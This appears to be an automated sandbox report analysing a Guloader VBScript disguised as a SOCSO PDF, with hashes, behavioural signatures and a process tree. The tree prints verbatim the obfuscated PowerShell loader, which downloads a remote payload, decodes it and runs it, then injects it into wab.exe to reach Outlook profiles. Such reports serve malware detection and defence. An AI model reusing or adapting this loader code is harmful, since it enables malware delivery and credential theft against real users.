Analysis
-
max time kernel
92s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2023 06:50
Static task
static1
Behavioral task
behavioral1
Sample
SOCSO_20230005324867·pdf.vbs
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
SOCSO_20230005324867·pdf.vbs
Resource
win10v2004-20231023-en
General
-
Target
SOCSO_20230005324867·pdf.vbs
-
Size
255KB
-
MD5
f1e7be6402e721940bddf3f1d917aaf5
-
SHA1
6c04996641de91fc7adcf12d0791e2e9e174c856
-
SHA256
4d102deeb0b15997e2197b8e69db45f5fe951c2b5091a5ccac7a8e26ea261652
-
SHA512
3355c3501c262cb4cb47880abdbfdc82e7220bf02d982272bf54902526af2cf8e34faf546d4d13849822ae9c1325057eecc6088a45ee434b7c9e53d87e22347d
-
SSDEEP
6144:jb1IJnEsovnKtPiPPL8+MOyqBT0LgPnOtwybUnmQ:f1/nKKPLJMdfwyTQ
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 5032 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 4196 wab.exe 4196 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 836 powershell.exe 4196 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 836 set thread context of 4196 836 powershell.exe 113 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1232 powershell.exe 1232 powershell.exe 836 powershell.exe 836 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1232 powershell.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 4196 wab.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 5032 wrote to memory of 1232 5032 WScript.exe 101 PID 5032 wrote to memory of 1232 5032 WScript.exe 101 PID 1232 wrote to memory of 836 1232 powershell.exe 103 PID 1232 wrote to memory of 836 1232 powershell.exe 103 PID 1232 wrote to memory of 836 1232 powershell.exe 103 PID 836 wrote to memory of 4196 836 powershell.exe 113 PID 836 wrote to memory of 4196 836 powershell.exe 113 PID 836 wrote to memory of 4196 836 powershell.exe 113 PID 836 wrote to memory of 4196 836 powershell.exe 113 PID 836 wrote to memory of 4196 836 powershell.exe 113 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOCSO_20230005324867·pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Trskninge ([String]$Ornecentr){$Puff = 8;$Suldanf154 = ($Ornecentr | Measure-Object -Character).Characters;For ($Iwwoodinte=7; $Iwwoodinte -lt $Suldanf154-1; $Iwwoodinte+=$Puff){$Unvolu=$Unvolu+$Ornecentr.Substring($Iwwoodinte, 1)};$Unvolu;}$Gettysbu=Trskninge 'HarvernhModetsstlngdematclistotp Germuns Ganjas:Griffon/Nellies/ ClickydRestgldrBruisafi PuckfivBraendpeRechall.Chiningg Tapperouniverso Mestreg elskerlNervebueInsocia.DenticucFlerfamoballonpm Tilvir/TenrecsuoutsliccGumbero?ansamleeAbbrevixBrugsgepPrivatpoValetudrLivreddtHatchet= BecifrdIscenesobarrancwAddressnForksmilAccomplo TweakeaUnfantad Flkkse&ForentaiRandbetdOctinge=Opsigel1Torpedoa OrthosBUndividKStokesiGSkumlerKQuadripFAmalgamqHeadrooQFoldedr- Relati6RobinfoBHypotesaNonbiturCimbria3MummifiQYachtisRGelatedZFredlysVkurinitbtilkomsa Interf4SulfuryE ShampoWDhanuramDevalueaOrkerenSCouteauzBuslommgVealski5 IndopeQDepraveuDiffusi2 Stereo ';$Unvolu01=Trskninge ' KunkuriParadigeUpperstxLaddiki ';$Bakskul= $Unvolu01;$Dativer = Trskninge 'Optankn\AnnonacsAssadstyporsenesHalshviw CrummooFilistrwhygrome6Fustleo4 Chessd\ KlarlgWKerneneiRearguenMadonnadapothegoPhotophwAdresses SlendrP ValfaroVedblevwInteresePlanishrImpressSUnreprehUskrmtee FormallAprosoplIndsukr\EkvilibvSierral1Handrea.resulta0 Mythol\ Fasanhp Bogtryo UmbracwAdoptioe vrnerirFructifsMuskineh ParadieUncomprlStorfyrlStribni. KonkureLuckingxHubertoeForskni ';& ($Unvolu01) (Trskninge 'Profete$AerodroBTydeligasandelngFiskestgSynssanaFrstebeaDegummir entomodModemli2Genfrem=Feyerce$GuldbryeWaistconrettefavSpidsni:HndendewCosmozoi interanConsolad plataniXylofonrAarsber ') ;& ($Unvolu01) (Trskninge 'Pulveri$ UdvelsDBulgesyaBestigetIndoorpiPsychosvIllusioeegeranhrPacksad=Hustank$BagerbuBundergeaGestantg Unpremgeurochea ForlenaNorthearBannerfdSstykke2skgenda+Sortest$SkumlerDNemascoaNdringstArgumeniCistercvDocentue preussr linieu ') ;& ($Unvolu01) (Trskninge 'Rfathea$TrimestB paratyaDemobilncongasfk optaarjBienniooBregnerb hemoclmWashhaneProphes Sofasen= Bideta Farvelg( Decibe(Intentig MateriwFunctiomJarnissitrakkas UdskifwsommertiEtymolonMarcipa3Gelledd2Tubfull_Upcheerp Eskimor SekteroCoercercInapproe SkoleesmicrotusSurmlks Headhun-UnsegreFPolycar AgrarePbdeansvruncapteoMatriarcChrismaeMontesssPyeloursTyndsleIInfektidCentesi=Bertopa$Frivole{ StraleP OmtrenIvietconDtopcast}Exartic)Bhiltil.NonsyndCBaksgasoRegularmConferemAgglomeaComminantolerandBadevanL TurnipiHarzburn Kartotehalslge)aktbefr Connect-Udtmnins LobbympCongeall PlateaiClartietHelioel Transpe[BarneaacSlutskehPredisraPicturerSpeerin]Overbri3 hellig4 Phasit ');. ($Unvolu01) (Trskninge ' Skaani$PolyadeM Deledmn OutsidiKulturcuActinosmMachini Opgavef=Formaal Firebr$SocioloBFortrinaRumstjbnFlammeskClarinejTussahcoSelskabbComperemYeggmeneSkinbar[ Dokume$OrdforkB FiloseaKysseren OadhyekBaksninjGoosefooAnonymibHeksagrmPopulareBengter.RetrievcImposito BourlauCulmingn Genindt Ressou-aerohyd2Vandlbs]Sportsf ');& ($Unvolu01) (Trskninge 'Subjekt$ AandeaSskabilkyDialyzanautodidoHobbyrud TageteaBrainpalImprovel AbonneyTelfonm=Spillek( UnsedaT SkndegeTransfes PhonomtCarbond-PaatagePArbejdsaVedetsttTavlernhUdskuds forskn$BenfrieDhederalaGuiltshtTerroriiSurpeopvUdtageleEwasblerSubelap)Overvej Helicop-RevivifAHeterotnHoudinidArdentl Homogen(Nevilss[HundekiICelleden AmphimtmultiguPRettight UbrugtrNonboas]Kilovar:Milieuf:SprngfasSplidagiAlbumenzvandbreeUrtiden Rekviem-IntereseLspestaqHleripr Kattyss8Fletkod)Tachyph ') ;if ($Synodally) {. $Dativer $Mnium;} else {;$Unvolu00=Trskninge 'FrihedsSBirkentt subacraRdderlirSadielitFritids-UncloakB EvasioiChassist Lapidas LandssTSkottehrUnburroaWamozarn GorvarsrivegilfCirrusseStubkjarBackbre Premie-AntoniaSMellituoCampereu Osmomer OverwocTvangsfeLundhol Kongres$BlaajenGUdsgendeKontroltAgnessttKobenreyArmkrftsLavestbb Skriveumillime Additio-EspecomD FrivoleFormandsMusiciat DissekiSvovlkinUnderbea HumorotKapitali SlalomoDeklaman Overde Cylinde$UnmutuaB bestveaindolergfructuogStaalsta resoluaSubuneqr Klamred Lervar2 Perspe ';& ($Unvolu01) (Trskninge 'Myrtusd$ FritidBSlbcurraFortidsg MaggiegNonubiqa Overbaa NycterrHalutzbdBolsjes2Krybekl=slutkod$ Sociale KartotnSkmtsarvorangef:LadyismaUnshrilpMammitipStatsfodSuperswaBlindsmtOverstraCrazesb ') ;& ($Unvolu01) (Trskninge ' convenISacrocom HaematpRoklubbo UnomenrBillardtVigesim-FrihavnMFustieso Carlesd Kanareu PreovelHenstteeBlueste TrommeBTranesiiSkovfyrt ZealotsOutreneTHyperberWilmaraa OptimenPitmanmsmegalokfvandalieCocketrrGibbern ') ;$Baggaard2=$Baggaard2+'\Hundjvlen.Pre';while (-not $Fraktio209) {& ($Unvolu01) (Trskninge 'Uglered$ SpeedbFPsychodrTerebraa DuelbekVachetttidiotroiMollycooGulespu2Repouss0Elidere9Trovaer= Despis(DelegatTHoodsroeTafletbsSwamiestPollaki-DerangePTiedogtaPolermitLuftninhUnsombe Nudiped$ BesmelBPecoptea sengebgHusdyregFyrstesaStueurea DomicirMastectdEsbjerg2Brdfrug) Statoi ') ;& ($Unvolu01) $Unvolu00;& ($Unvolu01) (Trskninge 'SueoxybS BannertOverreaaWenzelsr KoftamtViolenc-AfklendSCorrigelHistorieRefertieGarantepsigilla Nonperf5Borttag ');}& ($Unvolu01) (Trskninge 'Ligebeh$PicketeCSpermath GynantiFilmkunvFaareklaMartyrdrTweezer Pterian=Vvsforl RumfartGForbudseAfklapst Medhjl-MagindaC ForskaoLethalinCommisstUnobtaie Pistoln TaxabltArachni Anteria$BirdyhaB EndotoaRictuscgVibescigFocalisaWelledtaForelqurTequiladOxyacet2Fishies ');& ($Unvolu01) (Trskninge 'Sischap$TrskereASmerglen RediffnSuperoraContrac Papirma=Jordbrm Halidso[AfpresnSspaantayDendrolsMallecht TraveseIsuroidmfourthl.AnyagriCnoncoploTurbolanImprovivstyrereeSttevogrGeneraltBestall]Sprgebi:Sslange:RhapsodFOvergenrLiveneroKlippehmRetsmedBunforceaPhragmostillgsfeovercon6 Databe4SamanidSVanesretMusikinrHuskattiColdbetnBanemrkgEpipodi(Clenchv$LodhiveC BurrfihLuksusaiBawdierv ArchonaBenvnsnrsamfund)Beignet ');& ($Unvolu01) (Trskninge 'Expatri$BilliggU JetmotnanalogivSjusseroBullcallbrinkesuYestere2Bysteaf Idrtsfo=Deutero Adiapho[BredygtSTeletexyMekanissSacchartCampisteHellerimkontrol.LovliggT ArvingeAdamsenxDaemonet Luftru.PansskuEPersillnMadmodecEubacteoBrndvrdd DownfaiTarokkonSkribengAgleafu]Trvesmu:Usolida:dadaistAVerdensSStandsfCHoneypoIPoserseI Michae.KlagejeGLaboureeCurfewetalkalisSTudskratUndelayrZaxtedei Behandn PjuskegPlastic( reddbo$stymperAPtocholnPuntillnsubternaOversig) Bovrup ');& ($Unvolu01) (Trskninge 'Imitati$UdfritkCValsacea AlarmsePseudomsDygtigeaSjalskr=Ordinan$FaselaaUStiklagnGlaikskvVitaminoForfremlIstindiuStrandk2Maxcolo.reicharsCarpmanuHemapodb KlumpesBredbaat MatcharAlleviaiOverdilnEnterotgPearles( Incogn Frednin Buksels2underbe5 Myopro7printks9smkssci9Sensati4skrumpe,Aandsfo1Choleri9Noninha6Pinched6Forsgsm9 Tuneup)Carmele ');. ($Unvolu01) $Caesa;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Trskninge ([String]$Ornecentr){$Puff = 8;$Suldanf154 = ($Ornecentr | Measure-Object -Character).Characters;For ($Iwwoodinte=7; $Iwwoodinte -lt $Suldanf154-1; $Iwwoodinte+=$Puff){$Unvolu=$Unvolu+$Ornecentr.Substring($Iwwoodinte, 1)};$Unvolu;}$Gettysbu=Trskninge 'HarvernhModetsstlngdematclistotp Germuns Ganjas:Griffon/Nellies/ ClickydRestgldrBruisafi PuckfivBraendpeRechall.Chiningg Tapperouniverso Mestreg elskerlNervebueInsocia.DenticucFlerfamoballonpm Tilvir/TenrecsuoutsliccGumbero?ansamleeAbbrevixBrugsgepPrivatpoValetudrLivreddtHatchet= BecifrdIscenesobarrancwAddressnForksmilAccomplo TweakeaUnfantad Flkkse&ForentaiRandbetdOctinge=Opsigel1Torpedoa OrthosBUndividKStokesiGSkumlerKQuadripFAmalgamqHeadrooQFoldedr- Relati6RobinfoBHypotesaNonbiturCimbria3MummifiQYachtisRGelatedZFredlysVkurinitbtilkomsa Interf4SulfuryE ShampoWDhanuramDevalueaOrkerenSCouteauzBuslommgVealski5 IndopeQDepraveuDiffusi2 Stereo ';$Unvolu01=Trskninge ' KunkuriParadigeUpperstxLaddiki ';$Bakskul= $Unvolu01;$Dativer = Trskninge 'Optankn\AnnonacsAssadstyporsenesHalshviw CrummooFilistrwhygrome6Fustleo4 Chessd\ KlarlgWKerneneiRearguenMadonnadapothegoPhotophwAdresses SlendrP ValfaroVedblevwInteresePlanishrImpressSUnreprehUskrmtee FormallAprosoplIndsukr\EkvilibvSierral1Handrea.resulta0 Mythol\ Fasanhp Bogtryo UmbracwAdoptioe vrnerirFructifsMuskineh ParadieUncomprlStorfyrlStribni. KonkureLuckingxHubertoeForskni ';& ($Unvolu01) (Trskninge 'Profete$AerodroBTydeligasandelngFiskestgSynssanaFrstebeaDegummir entomodModemli2Genfrem=Feyerce$GuldbryeWaistconrettefavSpidsni:HndendewCosmozoi interanConsolad plataniXylofonrAarsber ') ;& ($Unvolu01) (Trskninge 'Pulveri$ UdvelsDBulgesyaBestigetIndoorpiPsychosvIllusioeegeranhrPacksad=Hustank$BagerbuBundergeaGestantg Unpremgeurochea ForlenaNorthearBannerfdSstykke2skgenda+Sortest$SkumlerDNemascoaNdringstArgumeniCistercvDocentue preussr linieu ') ;& ($Unvolu01) (Trskninge 'Rfathea$TrimestB paratyaDemobilncongasfk optaarjBienniooBregnerb hemoclmWashhaneProphes Sofasen= Bideta Farvelg( Decibe(Intentig MateriwFunctiomJarnissitrakkas UdskifwsommertiEtymolonMarcipa3Gelledd2Tubfull_Upcheerp Eskimor SekteroCoercercInapproe SkoleesmicrotusSurmlks Headhun-UnsegreFPolycar AgrarePbdeansvruncapteoMatriarcChrismaeMontesssPyeloursTyndsleIInfektidCentesi=Bertopa$Frivole{ StraleP OmtrenIvietconDtopcast}Exartic)Bhiltil.NonsyndCBaksgasoRegularmConferemAgglomeaComminantolerandBadevanL TurnipiHarzburn Kartotehalslge)aktbefr Connect-Udtmnins LobbympCongeall PlateaiClartietHelioel Transpe[BarneaacSlutskehPredisraPicturerSpeerin]Overbri3 hellig4 Phasit ');. ($Unvolu01) (Trskninge ' Skaani$PolyadeM Deledmn OutsidiKulturcuActinosmMachini Opgavef=Formaal Firebr$SocioloBFortrinaRumstjbnFlammeskClarinejTussahcoSelskabbComperemYeggmeneSkinbar[ Dokume$OrdforkB FiloseaKysseren OadhyekBaksninjGoosefooAnonymibHeksagrmPopulareBengter.RetrievcImposito BourlauCulmingn Genindt Ressou-aerohyd2Vandlbs]Sportsf ');& ($Unvolu01) (Trskninge 'Subjekt$ AandeaSskabilkyDialyzanautodidoHobbyrud TageteaBrainpalImprovel AbonneyTelfonm=Spillek( UnsedaT SkndegeTransfes PhonomtCarbond-PaatagePArbejdsaVedetsttTavlernhUdskuds forskn$BenfrieDhederalaGuiltshtTerroriiSurpeopvUdtageleEwasblerSubelap)Overvej Helicop-RevivifAHeterotnHoudinidArdentl Homogen(Nevilss[HundekiICelleden AmphimtmultiguPRettight UbrugtrNonboas]Kilovar:Milieuf:SprngfasSplidagiAlbumenzvandbreeUrtiden Rekviem-IntereseLspestaqHleripr Kattyss8Fletkod)Tachyph ') ;if ($Synodally) {. $Dativer $Mnium;} else {;$Unvolu00=Trskninge 'FrihedsSBirkentt subacraRdderlirSadielitFritids-UncloakB EvasioiChassist Lapidas LandssTSkottehrUnburroaWamozarn GorvarsrivegilfCirrusseStubkjarBackbre Premie-AntoniaSMellituoCampereu Osmomer OverwocTvangsfeLundhol Kongres$BlaajenGUdsgendeKontroltAgnessttKobenreyArmkrftsLavestbb Skriveumillime Additio-EspecomD FrivoleFormandsMusiciat DissekiSvovlkinUnderbea HumorotKapitali SlalomoDeklaman Overde Cylinde$UnmutuaB bestveaindolergfructuogStaalsta resoluaSubuneqr Klamred Lervar2 Perspe ';& ($Unvolu01) (Trskninge 'Myrtusd$ FritidBSlbcurraFortidsg MaggiegNonubiqa Overbaa NycterrHalutzbdBolsjes2Krybekl=slutkod$ Sociale KartotnSkmtsarvorangef:LadyismaUnshrilpMammitipStatsfodSuperswaBlindsmtOverstraCrazesb ') ;& ($Unvolu01) (Trskninge ' convenISacrocom HaematpRoklubbo UnomenrBillardtVigesim-FrihavnMFustieso Carlesd Kanareu PreovelHenstteeBlueste TrommeBTranesiiSkovfyrt ZealotsOutreneTHyperberWilmaraa OptimenPitmanmsmegalokfvandalieCocketrrGibbern ') ;$Baggaard2=$Baggaard2+'\Hundjvlen.Pre';while (-not $Fraktio209) {& ($Unvolu01) (Trskninge 'Uglered$ SpeedbFPsychodrTerebraa DuelbekVachetttidiotroiMollycooGulespu2Repouss0Elidere9Trovaer= Despis(DelegatTHoodsroeTafletbsSwamiestPollaki-DerangePTiedogtaPolermitLuftninhUnsombe Nudiped$ BesmelBPecoptea sengebgHusdyregFyrstesaStueurea DomicirMastectdEsbjerg2Brdfrug) Statoi ') ;& ($Unvolu01) $Unvolu00;& ($Unvolu01) (Trskninge 'SueoxybS BannertOverreaaWenzelsr KoftamtViolenc-AfklendSCorrigelHistorieRefertieGarantepsigilla Nonperf5Borttag ');}& ($Unvolu01) (Trskninge 'Ligebeh$PicketeCSpermath GynantiFilmkunvFaareklaMartyrdrTweezer Pterian=Vvsforl RumfartGForbudseAfklapst Medhjl-MagindaC ForskaoLethalinCommisstUnobtaie Pistoln TaxabltArachni Anteria$BirdyhaB EndotoaRictuscgVibescigFocalisaWelledtaForelqurTequiladOxyacet2Fishies ');& ($Unvolu01) (Trskninge 'Sischap$TrskereASmerglen RediffnSuperoraContrac Papirma=Jordbrm Halidso[AfpresnSspaantayDendrolsMallecht TraveseIsuroidmfourthl.AnyagriCnoncoploTurbolanImprovivstyrereeSttevogrGeneraltBestall]Sprgebi:Sslange:RhapsodFOvergenrLiveneroKlippehmRetsmedBunforceaPhragmostillgsfeovercon6 Databe4SamanidSVanesretMusikinrHuskattiColdbetnBanemrkgEpipodi(Clenchv$LodhiveC BurrfihLuksusaiBawdierv ArchonaBenvnsnrsamfund)Beignet ');& ($Unvolu01) (Trskninge 'Expatri$BilliggU JetmotnanalogivSjusseroBullcallbrinkesuYestere2Bysteaf Idrtsfo=Deutero Adiapho[BredygtSTeletexyMekanissSacchartCampisteHellerimkontrol.LovliggT ArvingeAdamsenxDaemonet Luftru.PansskuEPersillnMadmodecEubacteoBrndvrdd DownfaiTarokkonSkribengAgleafu]Trvesmu:Usolida:dadaistAVerdensSStandsfCHoneypoIPoserseI Michae.KlagejeGLaboureeCurfewetalkalisSTudskratUndelayrZaxtedei Behandn PjuskegPlastic( reddbo$stymperAPtocholnPuntillnsubternaOversig) Bovrup ');& ($Unvolu01) (Trskninge 'Imitati$UdfritkCValsacea AlarmsePseudomsDygtigeaSjalskr=Ordinan$FaselaaUStiklagnGlaikskvVitaminoForfremlIstindiuStrandk2Maxcolo.reicharsCarpmanuHemapodb KlumpesBredbaat MatcharAlleviaiOverdilnEnterotgPearles( Incogn Frednin Buksels2underbe5 Myopro7printks9smkssci9Sensati4skrumpe,Aandsfo1Choleri9Noninha6Pinched6Forsgsm9 Tuneup)Carmele ');. ($Unvolu01) $Caesa;}"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4196
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82